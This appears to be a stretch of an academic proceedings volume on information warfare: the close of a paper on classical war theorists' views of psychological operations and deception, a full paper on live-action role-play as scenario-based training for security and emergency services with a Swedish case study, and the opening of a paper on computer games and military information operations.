Liddell Hart continued to acknowledge the value of psychological operations and the protection of one's own spirit, and stated that to foster the people's willing spirit is often as important as possessing the more concrete forms of power (Liddell Hart 1991). He also wrote, on the action of strategy, that in studying the physical aspect we must never lose sight of the psychological, and only when both are combined is the strategy truly an indirect approach, calculated to disturb the opponent's balance (Liddell Hart 1991). Liddell Hart derived his ideas from previous war leaders' comments and dilemmas, such as how to achieve the moral breakdown of the enemy before the war has started (Liddell Hart 1991). He concluded that in the end it is loss of hope rather than loss of life that decides the issues of war.
3. Conclusion
The importance of affecting opponents' minds has been acknowledged at least from the days of Sun Tzu. All of the theorists mentioned in this article discuss psychological operations. The means of affecting the opponent's mind were of course more limited in those times in comparison to our current era of mass media, which has brought new ways to affect it. As with many developments, media can be just as much an asset as a hindrance in warfare.
Military deception has been effectively used in warfare throughout history. In about three-quarters of the military operations conducted during the 18th century, surprise was achieved through deception. Of the theorists discussed here, Clausewitz is surprisingly the one who did not consider military deception to be very effective. This might be because he was concerned with the essence of war on a more strategic level, as a means to achieve political objectives. Most theorists do acknowledge the importance of deception and of keeping plans and manoeuvres secret from the enemy through OPSEC.
The revolution in military affairs has been discussed at length by military researchers. However, in light of the writings of former war theorists, there seems to have been more of a revolution in military technology than in warfare in general. The same basics from the time of Sun Tzu still apply and are emphasized in the writings of subsequent theorists. However, the information environment in which military operations are being conducted has expanded greatly both in content and scope.
Military operations have changed since the times of the war theorists dealt with in this article. The modern operations area usually includes not only our own and the opponent's forces but also neutral locals, non-governmental organizations, multinational actors and global audiences reached through media. The information environment of military operations has expanded to cover the entire world, and any effects in it are very prompt. This has created new challenges for analyzing the information environment.
Previous war theorists considered the target of INFO OPS to always be the opponent. As military operations become more comprehensive and the information environment expands, targets also include neutral parties, allies and even one's own people.
War theorists perceived the value of methods that we now call information operations. Psychological operations, military deception and operations security are not new ways to conduct war, but there are new ways of using those elements in warfare and new collateral effects to consider.
References
Barnet, Correlli (1978) Bonaparte, George Allen & Unwin Ltd. pp 116–117.
Britt, Albert Sidney & Griess, Thomas E. (2003) The Wars of Napoleon, New York, Square One Publishers. Available: http://books.google.com (19.1.2011) pp 35–36.
Chandler, David G. (2002) The Military Maxims of Napoleon, Translated by Sir George C. D'Aguilar, London, Greenhill Books. pp 59, 61, 69, 74, 77.
Clausewitz (1989) On War, edited by Michael Howard & Peter Paret, New Jersey, Princeton University Press. pp 94, 184, 198, 202.
Clausewitz (2008) On War, Translated by J.J. Graham, Digireads.com Publishing. Available: http://books.google.fi (19.1.2011) pp 37, 50, 96, 97, 157, 165, 384, 486, 510.
de Saxe, Maurice (1944) Reveries on the Art of War, Translated and edited by Thomas R. Phillips, Harrisburg, Pennsylvania, The Military Service Publishing Company. p 27.
Liddell Hart, Basil (1991) Strategy, second revised edition, New York, Penguin Books. pp 5, 208, 212, 322, 327.
MNIOE Applied Concept (2009) The Military Information Operations Function within a Comprehensive and Effects-Based Approach, Final Draft Version 3.0, Bonn, MNE5. pp 18–22.
Tzu, Sun (1998) Sodankäynnin taito (The Art of War), Helsinki, Tietosanoma Oy. pp 76, 86, 105, 107, 114, 116–117.
Vegetius (2004) Epitoma Rei Militaris, edited by M.D. Reeve, Oxford, Clarendon Press. pp 6, 108–109, 117, 119.
Live-Action Role-Play as a Scenario-Based Training Tool for Security and Emergency Services
Sara Hjalmarsson
Edith Cowan University, Joondalup, Western Australia
shjalmar@our.ecu.edu.au
Abstract: Appropriate training and knowledge development is highly relevant to leaders and security professionals in the fields of information warfare and counter-terrorism. Scenario-based training methodology has a long history among military, law enforcement, emergency services and the private sector. It is recognised as an effective method for preparing leaders to make critical decisions under pressure. Over time, several models have been developed to illustrate its components and characteristics. Live-Action Role-Play (LARP) has been defined as a unique art form that, like scenario-based training, can only be experienced as it is being created. It is an international phenomenon with a diverse range of styles and characteristics. The current leading-edge developments occur in the Nordic countries (Sweden, Denmark, Finland and Norway). Although LARP is primarily used for entertaining games, the art form bears significant resemblance to scenario-based training and could be adapted for authentic tasking exercises. LARP contrasts with scenario-based training in its use of persona within a variable narrative engine and a context that includes many layers of complexity. Educational Live-Action Role-Play, known as Edu-LARP, has been integrated into the Danish school system via Østerskov Efterskole, a boarding school for students aged 14-17 that follows the Danish national curriculum. LARP participants are already being used in training exercises for emergency services due to their dynamic improvisation skills and cost-effectiveness. Experienced organisers and participants could contribute their ability to generate scenarios, work with uncertainty and "think like the enemy, without becoming the enemy" to the design and execution of training exercises. Additionally, they could contribute to scenario generation for scenarios involving a high level of uncertainty, such as terrorist attacks and critical infrastructure incidents. LARP events themselves could also be adapted to the training needs and attributes of the audience, creating training that fully engages the trainee and results in improved learning outcomes. As in the case of scenario-based training, the use of LARP, LARP participants and LARP organisers must be implemented appropriately for them to be effective. This implies, for example, that participants and organisers must be experienced. It also implies that LARP used for training purposes would demand an appropriate narrative engine, educational framework and level of complexity suitable to the audience. Although this paper identifies that there is significant potential in the LARP art form, it also recommends that further research be conducted to explore the relevance of different styles, aspects relating to effective implementation and possible other uses of the art form.
Keywords: authentic tasking, critical infrastructure protection, scenario generation, scenario-based training, live-action role-play, edu-LARP
1. Introduction
All good training methods should include some form of simulation. LARP can add an element of uncertainty to it.
Lunau 2010
There exists a significant need to prepare leaders for decision-making in a crisis situation (Moats, Chermack, and Dooley 2008). Appropriate training and knowledge development is highly relevant to security professionals within the fields of information warfare and counter-terrorism. This is particularly important to critical infrastructure industries, where incident consequences may impact significantly on the continuity of other industries. Games and role-play have been effectively used in the past for training purposes, and Live-Action Role-Play (LARP) offers another step in this continuum due to its inherent similarities to scenario-based training (Bowman 2010, Blanchard & Thacker 2010).
This paper builds on the work of Burns, Cannon-Bowers, Pruitt and Salas (1998), Burke & Salas (2002) and Cohn, Lyons and Schmorrow (2002), briefly outlining their training models. Based on these models, the processes of LARP and scenario-based training have been compared and contrasted. This is an explorative paper and does not aim to propose a complete solution, but rather to highlight an emerging discipline that may offer a valuable contribution to planning, simulation and training related to information warfare. Further research will be necessary to establish how LARP can contribute, where it is appropriate and where it is not appropriate.
For the sake of consistency, certain conventions of definition and terminology will be used within this paper. Please note that the Nordic LARP conference will be referred to by its Norwegian name (Knutepunkt) for the purpose of this essay, as the first conference was held in Norway. This paper shares the approach of the Knutepunkt publications and ELIN (Education-LARPers' International Network), which consider LARP a distinct art form, rather than a form of theatre or wargame.
2. Scenario-based training
Scenario-based training differs from traditional training in several aspects. It focuses on the acquisition of complex tasks and was originally developed to support team training (Burns, et al, 1998, Oser, 1999). In this method of training, the curriculum is organised within a systematically developed scenario, rather than a conventional curriculum (Burns, et al. 1998, Oser 1999). Such training has been used by military, police, emergency services and the private sector to prepare trainees for a variety of situations by simulating the real experience. The USA's Federal Bureau of Investigation has put new recruits through a 14-week long simulation of an investigation that included a mock trial (Whitcomb, 1999; Van Hasselt, et al., 2008). The Mecklenburg EMS Agency, also in the USA, has a fully integrated simulation studio for training emergency medical personnel (Bioterrorism Week, 2007). Even the first army post-mobilisation training for Iraq included a scenario-based training model called Theatre Immersion (Honoré and Zajac, 2005).
Effectively implemented scenario-based training has a number of benefits. Its simulation-based methodology has proven more effective than problem-based training for acquiring critical assessment and management skills (Steadman et al. 2006). It can also provide trainees with authentic tasking exposure and the opportunity to evaluate multiple potential outcomes of a situation (Moats, et al., 2008; Oser, 1999; Burke & Salas, 2002). Additionally, it can serve to reduce training costs without compromising training quality (Burke et al, 2006). The effective use of scenario-based training depends on appropriate implementation. Poorly implemented, scenario-based training may result in the wrong thing being learned, inadequate focus on the relevant skills or failure to relate training to the real-world environment. Consequently, the scenarios and training programs must be engineered to achieve the desired objectives, and a number of models have been developed to illustrate this process (Burns, et al, 1998; Burke & Salas, 2002; Oser, 1999).
Figure 1 illustrates the scenario-based training cycle as described by Burns et al. in 1998 and further adapted by Burke & Salas in 2002. The first step of this cycle involves specifying training objectives and competencies (2 and 3), based on analytical approaches. An understanding of the knowledge, skills and attitudes that are characteristic of effective performance (KSAs) is critical at this stage. The first step must then drive the second (4), where the scenario and its tasks are crafted to allow the trainees to perform the targeted skills, so they may be effectively assessed. If the scenario is not developed explicitly to exercise the objectives, valuable time will be lost on non-essential elements. In the third step (5), performance measures and standards for evaluating the trainees are developed. If this step is effectively executed, it becomes possible both to determine what was done well and to explain why a particular behaviour occurred. This makes it possible to identify and address deficiencies in the trainee's knowledge. Thus, diagnostics can be created that are then used to assess and provide feedback to the trainee(s) (6). Finally, the performance information must flow into the next training session, so it may build on, rather than duplicate, the trainee's knowledge (1).
Figure 1: The components of scenario-based training, adapted from Burns et al. (1998) and Burke & Salas (2002)
Cohn et al. (2002) offer a similar model that places the components of scenario-based training into three phases comprising planning, execution and assessment. This model is illustrated in Figure 2 (Vincenzi, 2008, pp. 207-208). In this model, the planning phase involves the development of clear instruction objectives and identification of the tasks that the trainee is to undertake. These tasks are linked to the learning or training objectives of the trainee and consequently to the competencies desired. During this phase, the focus of the scenario is documented based on the skill inventory and the historical performance of the training audience (Vincenzi, 2008, pp. 207-208).
Figure 2: The SBT cycle, adapted from Vincenzi (2008), p.208
3. Live-action role-play and educational live-action role-play
Live-Action Role-Play (LARP) has been described as an art form that is unique due to its participatory nature. There is no audience and LARP is not usually recorded. Rather, it is experienced exclusively in the first person. Instead of a script, guidelines and constraints are used for direction.
Similarly to scenario-based training, LARP can only be experienced through direct participation in a live event such as an activity, exercise or production. There are also international conferences held on the topic of LARP, of which Knutepunkt is regarded as the most influential. Although LARP is an international phenomenon, the current leading-edge developments have been identified as occurring in the Nordic countries (Interacting Arts, 2010). The Nordic LARP tradition has also been documented by Stenros & Montola (2010).
LARP offers a unique narrative medium that has been used for many different purposes. The events themselves are primarily used for entertainment, but have also found value within television productions such as the Danish Barda. Another popular use is for games, such as White Wolf's Vampire, the German Drachenfest event, the UK campaign Manticore and so on. LARP has also found its use within traditional education through Østerskov Efterskole, a Danish boarding school for students aged 14-17, which follows the Danish national curriculum (Hyltoft, 2008). Additionally, there exists an international network of researchers and individuals that already use LARP within the traditional school system, for adult education and in social work (ELIN 2010). This network is known as ELIN (Education-LARPers' International Network).
When used within an educational context, LARP is called Educational Live-Action Role-Play (Edu-LARP) (ELIN 2010). Edu-LARP resembles scenario-based training in the sense that the scenario becomes the curriculum. At Østerskov Efterskole, an educational framework and narrative engine fill a function similar to the scenario in scenario-based training. Within this, the students take on a role different from the self and an element that demonstrates one's participation (e.g. a costume). Roles and costumes do not necessarily need to be complex and can be symbolic in nature. The use of a role that is different from the self allows the student an opportunity to learn from mistakes in a safe environment without identifying personally with them.
Other elements critical to the success of Edu-LARP include preparation before the LARP event, participation during it, evaluation after the event is over and the incorporation of perceived free will. During the preparation stage, the scene is set, characters are created and self-study, research, seminars or tutorials take place. During the LARP event, the participating student becomes deeply engaged in the activity, which improves his or her learning (Hyltoft, 2010, Lunau, 2010).
The evaluation stage that follows the LARP activity coincides with the recommendations made by Burke & Salas (2002) and Vincenzi (2008) for scenario-based training, who advise this step in order to gauge participant learning. The perception of free will is about allowing the learner to make logical decisions without being hindered by non-contextual constraints. It implies that any prescribed options must have a viable foundation within the narrative framework (Hyltoft, 2010).
Figure 3: The Edu-LARP cycle, adapted from Hyltoft (2010) and Lunau (2010)
The students at Østerskov Efterskole are often used in training exercises conducted by local emergency services. They are preferred to others due to their dynamic improvisation skills and cost-effectiveness. As their skills improve, they become able to work with uncertainty, develop scenarios and, as stated by Lunau (2010), "think like the enemy, without becoming the enemy" (Hyltoft, 2010, Lunau, 2010). Presently, there exists little academic research and documentation on the subjects of LARP and Edu-LARP. Montola & Stenros (2010) and Bowman (2010) have conducted academic research and published comprehensive material on the subject. However, much of the documentation currently available is informal and may consist of online videos, articles on wikis, discussions in forums or material on online intranets. In addition, documentation is not always available in English. A scripted scenario involving a staged attack on a car in the event Skymningsland (discussed later in this paper) is publicly available on YouTube (Postapoka, 2010), but it is in Swedish. The Skymningsland post-event presentation is also available on YouTube (Supernaut242, 2010), but likewise only in Swedish. This can make it challenging to find useful data. Furthermore, there are significant regional differences in nomenclature and practice. These present a hurdle to researching the subject and obtaining verifiable reference material.
Another concern that has been voiced about LARP revolves around disappointing or unpleasant experiences. Some people participate in a particular event and either do not enjoy it or gain nothing from it. An explanation for this phenomenon is that LARP and Edu-LARP events have different styles and characteristics, and if a participant's personal preference does not align with a particular style, his or her experience may be unrewarding (Mäkelä, Koistinen, Siukola and Turunen, 2005). For this reason, it is helpful to understand some of the different models. The GNS theory developed by Edwards (2001) is referred to in Mäkelä et al. (2005) and offers a useful classification model. An extensive discussion of LARP models and LARP theory is outside the scope of this paper. For anyone who wishes to read further about LARP models and theories, both Mäkelä et al. (2005) and Montola & Stenros (2010) provide a detailed overview.
Figure 4: The three orientations illustrated as corners of an equilateral triangle, adapted from Mäkelä et al. (2005) and Kim (2003a, 2003b and 2005)
The Gamist orientation focuses on competition between participants as entertainment. Victory and loss conditions are very clear-cut, such as through a measure of points.
Narrativist events focus on creating story and drama. The entertainment factor created in these events also differs from that of gamist events.
Immersionist/Simulationist oriented events can resemble simulations. This type of event requires a unique set of skills from both the organiser and the participant. Such an event involves the greatest level of immersion into the scenario and role.
4. A case study
To compare and contrast LARP and scenario-based training, a case study was conducted of the Swedish LARP production Skymningsland (informally referred to as Duskland in English), organised by the non-profit association Lajvföreningen Solnedgång in 2010. Skymningsland was a realistic 4-day event set in a fictitious, contemporary post-conflict environment. The activities of the organisers were followed via direct communication using email and chat; the event website, intranet and forum; recordings of event presentations; direct observation of pre-event meetings; observation of the event itself; and video recordings of the post-event presentation at Snakkeklubben 2010. Participant activities were followed via the event intranet, forum, emails, participant meetings, workshops and a participant survey. The case study revealed similarities and differences between scenario-based training and LARP.
The Skymningsland production commenced with an extensive planning and preparation phase. During this phase, the organisers scouted locations, planned and budgeted. Feedback from previous events and peers served to guide them as the scenario, narrative, context and scripted scenarios were developed. Guidelines, graphics and literature were created and made publicly available via the event website. Skymningsland was formally announced at the Knutepunkt conference in April 2010 and at the 2010 Prolog LARP convention later in the year (Utbult et al., 2010).
Once an individual registered, they were required to design and describe the fictitious character they wished to play. They were also required to list any real-world skills that could be useful in the event (e.g. stage fighting, pyrotechnics licence, first aid training). To assist in developing an appropriate character, the website provided a list of suggested reading and viewing in addition to the guidelines, literature and concept art. Individual coaching was also offered free of charge to each participant and involved both feedback on the submitted description and personal advice (Lajvföreningen Solnedgång, 2010a; Utbult et al., 2010). Once approved, the fictitious character descriptions became searchable and could be viewed by other registered participants. This allowed them to identify other participants with whom to collaborate and build fictitious relationships, create mini-scenarios, or develop and rehearse scripted scenes within the constraints of the event guidelines. The participants' task during the event consisted of fulfilling these mini-scenarios, responding to scenarios arising spontaneously from the improvised participant-participant interaction and responding to those scenarios that were scripted by the organisers (Lajvföreningen Solnedgång, 2010a; Lajvföreningen Solnedgång, 2010b; Utbult et al., 2010; Karlsson, 2010).
Prior to the start of Skymningsland, participants were briefed on safety, rules and guidelines along with acting techniques. This occurred through written documents and a general brief on site. Additionally, participants were provided with a compulsory workshop on acting, stunts and safety. During the event itself, participants were free to act and respond as they wished within the constraints of the scenario, their own role design and the rules and guidelines prescribed for the event. Experienced organisers and functionaries were strategically and discreetly dispersed throughout the event location to monitor and manage it, provide quick response and ensure safety. This strategy allowed organisers to address incidents and emergencies with minimal disruption (Lajvföreningen Solnedgång, 2010a; Karlsson, 2010; Utbult et al., 2010). The event was followed by a significant debrief and assessment period. It commenced with a short, formal debrief, followed by several hours of socialising where participants could share and discuss their experiences. Following the event, participants were encouraged to share footage and provide feedback on the event in the online forum. Online character data could still be edited and thus could be updated with the character's story as it had evolved during the event (Utbult et al., 2010; Karlsson, 2010).
The feedback, photos and filmed material were retained by the organisation. A report on the Skymningsland event was also presented to the Snakkeklubben LARP discussion club (Karlsson, 2010). All this material contributed to the expansion of the knowledge bank that Lajvföreningen Solnedgång has been building since its first event. This knowledge bank feeds into the planning and preparation stage of the organisation's next event, as the data is used to develop and improve future productions (Lajvföreningen Solnedgång, 2010a; Utbult et al., 2010). The survey results indicated that the majority of respondents learned from participating in the event and that there was a higher likelihood of learning from team situations than from individual situations. 52% felt their ability to manage a crisis had improved, 77% felt better prepared to deal with real-life situations resembling what they experienced in the event and 63% had learned a new skill. Virtually all (97%) respondents had fun while participating.
Figure 5: Components of the methodology used by the organisers of the Skymningsland LARP event, adapted from Utbult et al. (2010a, 2010b), Karlsson (2010) and Lajvföreningen Solnedgång (2010a-d)
The methodology used by Lajvföreningen Solnedgång is illustrated in figure 5. When compared with the components and processes of the scenario-based training cycles (Burns et al., 1998; Burke & Salas, 2002; Vincenzi, 2008), they demonstrate a number of similarities. These are illustrated in table 1 and table 2.
Table 1: Comparison of processes from scenario-based training and the Skymningsland event

| Processes                | Scenario-based training                                                         | Skymningsland                                                                                                                                      |
|--------------------------|---------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------|
| Preparation and planning | Audience, task, learning objectives, competencies                               | Desired audience, organiser objectives, participant objectives, scenario and event, marketing                                                      |
| Execution                | Event scenario, performance measurement, data collection, performance diagnosis | Scripted scenarios, unscripted and participant-created scenarios, monitoring and management. No formal data collection or performance diagnostic. |
| Assessment               | Feedback and AAR, archive performance data, skills inventory                    | Formal and informal debrief and feedback, archive event and event evaluation data                                                                  |
Table 2: Comparison of components from scenario-based training and the Skymningsland event

| Scenario-based training                            | Skymningsland                                                                                                                                                                                                                                         |
|----------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| Skill inventory and performance data               | Knowledge bank and feedback from previous events. Character development records (where applicable).                                                                                                                                                   |
| Tasks and KSAs                                     | Expectations and requirements. Limited knowledge of KSAs.                                                                                                                                                                                             |
| Training objectives                                | Event objectives and participant objectives                                                                                                                                                                                                           |
| Exercises, events, curriculum, scenarios, scripts  | Organisers plan workshops, scripted scenarios and dramaturgy. They also assess non-scripted plot development, coach participants and design the event. Participants self-study, design costumes, props and characters. They also plan scenarios with other participants. |
| Performance measures and standards                 | Personal goals for participants. Community and informal standards for the event.                                                                                                                                                                      |
| Feedback and debrief                               | Short formal debrief. Extensive informal debrief. Feedback via forum, socialising, website and events.                                                                                                                                                |
Similarities were found primarily in terms of the processes and components involved in designing, executing and concluding the scenario. Differences could be observed in details relating to the different needs and objectives of scenario-based training for education and LARP for entertainment. Both evaluated the needs of their audience and the required competencies, but the scenario objectives were very different. The objective of Skymningsland was to be a satisfying event, so its objectives depended on market research rather than educational theory. Both disciplines offered scripted events, but Skymningsland placed significant focus on unscripted activity. In addition, it lacked performance measures, in contrast to scenario-based training.
Feedback and debrief constitute an important step in both scenario-based training and the Skymningsland event. Where this stage is formal in scenario-based training, at Skymningsland it was informal, consisting of discussion and socialising between individual participants. The formal feedback focused on the organisers of the event and was provided by the participants using web-based tools.
The processes and tools used for the Skymningsland event could be adapted for use in simulations and exercises related directly to information warfare. Live events could be used to prepare for situations involving social engineering, swarming and the physical aspects of information security. Additionally, they could be complemented with virtual activities, such as the simulation of a cyber attack. The online tools used to develop characters, fictitious relationships and mini-scenarios could be developed into a tuition and feedback tool. The organisers could be employed for scenario generation and the participants could be employed as interactive role-players.
5. The need for further research
Research on LARP and Edu-LARP is currently being conducted by academia and private initiatives. One such private initiative is the International Comparative LARP Study (Kann, 2010a and Kann, 2010b), which aims to survey LARP communities in different countries. This and other research is critical for determining how LARP and Edu-LARP can be used in scenario-based training for security, crisis preparedness, information warfare, authentic tasking, critical infrastructure and emergency services. Future studies should consider a wider range of LARP cultures, models and styles to determine whether these are variables with an impact on effectiveness. Such a study must also take into consideration pervasive LARP models. Research into these and other variables would also aid in determining the scope within which LARP could prove a useful tool and where it is not appropriate to implement it.
Literature such as Bowman (2010) and Ungdomsstyrelsen (1997, translated by Larsson, n.d.) and interviews (Lunau, 2010; Hyltoft, 2010) indicate that LARP participation aids in identity creation. Speculatively, this may reduce an individual's vulnerability to factors leading to radicalisation, such as identification with extremist groups. Thus, it may offer an avenue for the prevention of terrorism and crime. Although such a topic lies outside the scope of this particular paper, future research could explore this area further.
Future research could also explore further the various ways in which experienced LARP participants or organisers could be integrated into pre-existing or new scenario-based training programs. Such a study may explore how the same participants and organisers may be trained or educated in order to adapt their skills to a professional training environment. Such a study could contribute to a reduction of unemployment, both by creating opportunities for the LARPers themselves and for the individuals they train. It may also be relevant for research to design and test Edu-LARP activities tailored for the emergency services, security or even a crisis management team. For such an event to be appropriately designed, it will be necessary to find individuals with appropriate experience and determine key success factors.
6. Conclusion
The implementation and research of Edu-LARP within traditional and adult education and the indications of survey respondents demonstrate that LARP and Edu-LARP hold educational value. This holds true even when LARP events are tailored toward entertainment, as opposed to learning. Whereas a hybrid model could be tailored to distinct needs, it may also be possible for individuals to attend an appropriate LARP and self-manage their learning process.
This paper highlights the fact that LARP and Edu-LARP can offer several useful tools for scenario-based training and simulation. Nevertheless, further research is needed in order to determine how LARP can be most effectively utilised, to ascertain determinants of success and to identify a means to evaluate the appropriateness of non-educational LARP for training purposes. Developing and testing different LARP models for training purposes is yet another topic for future research. Additionally, future research may ascertain how organisers and participants can have their skills made more relevant to scenario-based training for critical infrastructure, emergency services and crisis preparedness. Furthermore, the role of LARP in identity formation could be researched to determine its value in counter-radicalisation.
References
Bioterrorism Week (2007) “Mecklemburg EMS introduces most-advanced situational training in America for emergency medical personnel”. Bioterrorism Week, October 1, 2007, p. 11. [electronic journal]. Available from [Accessed April 15, 2010]
Blanchard, P. N. and Thacker, J. W. (2010) Effective Training: Systems, strategies and practices. Pearson Education, New Jersey.
Bowman, S. L. (2010) The function of role-playing games: How participants create community, solve problems and explore identity. McFarland Press, NC.
Burke, C. S. and Salas, E. (2002) “Simulation for training is effective when”. Quality and Safety in Healthcare, 11(2), pp. 119-120. Available from [Accessed June 4, 2010]
Burns, J. J., Cannon-Bowers, J. A., Pruitt, J. S. and Salas, E. (1998) “Advanced technology in scenario-based training”. In: Making decisions under stress: Implications for individual and team training, pp. 365-374. Available from [Accessed June 4, 2010]
Bøckman, P. (2003) “The Three Way Model – Revision of the Threefold Model”. In Gade, M., Thorup, L. and Sander, M. (eds) As Larp Grows Up – Theory and Methods, pp. 12-17. [E-book]. Available from http://www.darkshire.net/jhkim/rpg/theory/threefold/faq_larp.html [Accessed April 16, 2010]
Cohn, J. C., Lyons, D. M. and Schmorrow, D. (2002) “Scenario-based training with virtual technologies and environments”. Proceedings of the Image 2002 conference, Arizona, US.
Edwards, R. (2001) “GNS and Other Matters of Role-playing Theory” [online]. Available from http://www.indierpgs.com/articles/1 [Accessed December 27, 2010]
ELIN (2010) “Welcome to ELIN” [online]. Available from http://www.edularp.org/index.php?option=com_content&view=frontpage&Itemid=7 [Accessed April 23, 2010]
Föreningen Knutpunkt, Betahaus (n.d.) “What is Knudepunkt?” [online]. Available from http://www.knudepunkt.org/ [Accessed December 14, 2010]
Honoré, G. R. L. and Zajac, D. L. (2005) “Theater immersion: First army post-mobilisation training”. Armor, May/June 2005, p. 12. [electronic journal]. Available from [Accessed April 14, 2010]
Hyltoft, M. (2010) Interviewed by Hjalmarsson, S. [video interview]. Osted Fri- og Efterskole, Osted, Denmark, August 18, 2010.
Hyltoft, M. (2008) “The role-player's school: Østerskov Efterskole”. In Montola, M. and Stenros, J. (eds) Playground worlds: Creating and evaluating experiences of Role-playing games, pp. 12-25. [E-book]. Available from http://www.solmukohta.org/pub/Playground_Worlds_2008.pdf [Accessed April 16, 2010]
Interacting Arts (2010) “New Anthology on Nordic live Role-Playing: Playing reality” [online]. Available from http://interactingarts.org/blogs/index.php?title=title_6&more=1&c=1&tb=1&pb=1 [Accessed April 22, 2010]
Kann, T. (n.d.) “International Comparative LARP Study” [online]. Available from http://www.larpresearch.net [Accessed February 22, 2010]
Kann, T. (2011) “International Comparative LARP Study”. Presentation held at Knudepunkt 2011, Helsinge, Denmark, February.
Karlsson, P. (2010) “Skymningsland”. Presentation held at Snakkeklubben, Stockholm, Sweden, September.
Kim, J. H. (2003a) “The Threefold Model FAQ” [online]. Available from http://www.darkshire.net/jhkim/rpg/theory/threefold/faq_v1.html [Accessed January 6, 2011]
Kim, J. H. (2003b) “The Origin of the Threefold Model” [online]. Available from http://www.darkshire.net/jhkim/rpg/theory/threefold/origin.html [Accessed January 6, 2011]
Kim, J. H. (2005) “The Evolution of the Threefold Model” [online]. Available from http://www.darkshire.net/jhkim/rpg/theory/threefold/evolution.html [Accessed January 6, 2011]
Lajvföreningen Solnedgång (2010a) “Skymningsland” [online]. Available from http://www.solnedgang.org/skymningsland
Lajvföreningen Solnedgång (2010b) “Skymningsland for Dummies” [online]. Available from http://www.solnedgang.org/skymningsland/?page=48
Lajvföreningen Solnedgång (2010c) “Lite data” [online]. Available from http://www.solnedgang.org/skymningsland
Larsson, E. (n.d.) Role-playing as leisure activity: Report from The Swedish National Board for Youth Affairs [translation]. Available from http://www.dragonbane.org/attachment/f20c14076824322fa2a4f3c2d7b6c3fc/7608fbb646610f702d18a51bc944c760/role-playing.pdf [Accessed August 30, 2010]
Lunau, M. (2010) Interviewed by Hjalmarsson, S. [video interview]. Østerskov Efterskole, Hobro, Denmark, August 17, 2010.
Moats, J. B., Chermack, T. J. and Dooley, L. M. (2008) “Using scenarios to develop crisis managers: Applications of scenario planning and scenario-based training”. Advances in Developing Human Resources, 10(3), pp. 397-424. [electronic journal]. Available from http://adh.sagepub.com/cgi/content/abstract/10/3/397 [Accessed April 14, 2010]
Montola, M. and Stenros, J. (eds) (2008) Playground worlds: Creating and evaluating experiences of Role-playing games. [electronic edition]. Available from http://www.solmukohta.org/pub/Playground_Worlds_2008.pdf [Accessed April 16, 2010]
Montola, M. and Stenros, J. (2010) Nordic LARP. Fëa Livia, Stockholm.
Mäkelä, E., Koistinen, Siukola and Turunen (2005) “The process model of Role-Playing”. In Bøckmann, P. and Hutchison, R. (eds) Dissecting LARP [E-book], pp. 205-236. Available from http://knutepunkt.laiv.org/kp05/dissectionlarp.pdf [Accessed April 26, 2010]
Oser, R. L. (1999) “Enhancing human performance in technology-rich environments: Guidelines for scenario-based training”. In Salas, E., Human/technology interaction in complex systems, Vol. 9, pp. 175-202. Stamford: JAI Press.
Postapoka (2010) Skymningsland – Bilincidenten [video online]. Available from http://www.youtube.com/watch?v=KfUXnjYIBZ8 [Accessed October 18, 2010]
Steadman, R., Coates, W. C., Huang, Y. M., Matevosian, R., Larmon, B. R., McCullough, L. and Ariel, D. (2006) “Simulation-based training is superior to problem-based learning for the acquisition of critical assessment and management skills”. Critical Care Medicine, 34(1), p. 151. Available from http://journals.lww.com/ccmjournal/Abstract/2006/01000/Simulation_based_training_is_superior_to.21.aspx [Accessed June 4, 2010]
Supernaut242 (2010) Skymningsland @ Snakkeklubben Stockholm [video online]. Available from http://www.youtube.com/watch?v=b8SmixHWoF0 [Accessed November 2, 2010]
Ungdomsstyrelsen (1997) Rollspel som fritidssysselsättning. Available from http://www.dragonbane.org/attachment/f20c14076824322fa2a4f3c2d7b6c3fc/0a2267918c7179c75df094e8550f37e9/rollspelsomfritidsysselsattning.pdf [Accessed August 30, 2010]
Utbult, S., Axner, J., Sortti, A. and Wallgren, S. (2010) [chat, personal messages and e-mail]. Personal communications, February 2, 2010 – September 5, 2010.
Vincenzi, D. A. and Wise, J. A. (2008) Human factors in simulation and training. USA: CRC Press.
Whitcomb, C. (1999) “Scenario-based training at the FBI”. American Society for Training & Development, June 1999, p. 42. [electronic journal]. Available from [Accessed April 14, 2010]
Computer Games as the Representation of Military Information Operations – A Philosophical Description of Cyborgizing of Propaganda Warfare
Aki-Mauri Huhtinen
Finnish National Defence University, Finland
aki.huhtinen@mil.fi
Abstract: The history of combat is primarily the history of radically changing fields of perception. In other words, war consists not so much of scoring territorial, economic or other material victories as of appropriating the immateriality of the perceptual field. The function of the eye has become the function of the weapon (Virilio 1989; 2009). To understand information age warfare we have to understand the concept of representation as a part of our process of violence. The idea of information warfare or an information operation is based on a process in which the physical target is no longer destroyed with kinetic systems, but in which non-kinetic systems, such as information, scan the symbolic-semiotic networks. Today, advanced mobile technology, the Internet and the entertainment industry in particular exploit the experiences of different wars and conflicts extensively, for example as ideas for computer games. In return, the military-industrial complex represents its own language, for example in the concept of information operations, with the help of applications rising particularly from the entertainment industry. The roles of Hector and Achilles and the teachings of Jomini and Clausewitz have an effect in the background of games and gaming. In contrast to Clausewitz's thinking, Jomini took the view that the amount of force deployed should be kept to the minimum in order to lower casualties and that war was a science, not an art. The most central genres in gaming are ”strategy”, ”adventure”, ”shooter”, ”sports”, ”simulation”, ”music”, ”role playing” and ”puzzle”. All of these are related to warfare in one way or another. Another interesting fact is that in the 1950s the first computer games were mathematical strategy-based games that had been developed in universities (Czosseck 2009; Peltoniemi 2009).
Keywords: computer games, decision making, information operations, propaganda, representation
1. Introduction
According to Sun Tzu, the acme of the art of war is a victory without fighting. Chess can be considered a game connected to the art of war: it follows a clear rational pattern, but the endless number of options makes it chaotic, creative, sudden and even tragic. In his classic piece the Iliad, Homer describes, through the warriors Hector and Achilles, the two central roles of warfare: warfare controlled by duty and warfare controlled by emotion. This duality can be seen throughout the history of the western art of war, sometimes emphasizing the rational and normative nature of warfare (Hector) and sometimes its intuitive, subconscious and emotional nature (Achilles). As the science of a new age advanced, Jomini developed geometric and mathematical models for warfare, whereas Clausewitz saw that war cannot be controlled rationally and is always affected by chance or friction. Today we can find this evolution of warfare, for example, in computer games (Bosquet 2009; Taylor 2003).
